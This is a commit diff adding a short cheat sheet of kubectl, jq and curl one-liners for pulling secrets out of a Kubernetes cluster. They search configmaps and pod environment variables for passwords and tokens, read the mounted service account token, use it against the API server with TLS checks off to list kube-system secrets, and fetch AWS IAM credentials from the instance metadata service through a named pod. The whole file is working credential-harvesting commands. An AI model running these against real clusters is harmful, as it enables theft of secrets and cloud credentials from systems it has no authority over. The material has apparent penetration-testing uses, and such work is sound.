first commit
This commit is contained in:
@@ -0,0 +1,21 @@
|
||||
|
||||
- Get all Configmaps With Sensetive Details In Keys
|
||||
- `kubectl get configmaps --all-namespaces -o json | jq -r '.items[].data | select(. != null)' | awk '{print(tolower($0))}' | jq -r 'with_entries( select(.key|(contains("pass") or contains("secret") or contains("token"))))'`
|
||||
|
||||
- Get all configmaps with sensetive details in values
|
||||
- `kubectl get configmaps --all-namespaces -o json | jq -r '.items[].data | select(. != null)' | awk '{print(tolower($0))}' | jq -r 'with_entries( select(.value|(contains("pass") or contains("secret") or contains("token"))))'`
|
||||
|
||||
- Get Containers With Sensitive Details In env
|
||||
- `kubectl get pods --all-namespaces -o json | jq -r '.items[].spec.containers[].env | select(. != null)' | awk '{print(tolower($0))}' | jq -r '.[] | select(.name | (contains("pass") or contains("secret") or contains("token")))'`
|
||||
|
||||
- Get the Kubernetes Token Mounted by Default
|
||||
- `TOKEN=$(kubectl exec $POD_NAME -n $NAMESPACE -- cat /var/run/secrets/kubernetes.io/serviceaccount/token)`
|
||||
|
||||
- Test Communication to the Kubernetes API Server
|
||||
- `kubectl exec $POD_NAME -n $NAMESPACE -- curl https://$API_SERVER/api --header 'Authorization: Bearer $TOKEN' --insecure`
|
||||
|
||||
- List all Kubernetes Cluster Secrets
|
||||
- `kubectl exec $POD_NAME -n $NAMESPACE -- curl https://$API_SERVER/api/v1/namespaces/kube-system/secrets --header 'Authorization: Bearer $TOKEN' --insecure`
|
||||
|
||||
- Get AWS EC2 Instance Metadata Token
|
||||
- `kubectl exec ingress-nginx-controller-df547d78c-rxww2 -n ingress-nginx -- curl http://169.254.169.254/latest/meta-data/iam/security-credentials/nodes.kopstest.k8s.local`
|
||||
Reference in New Issue
Block a user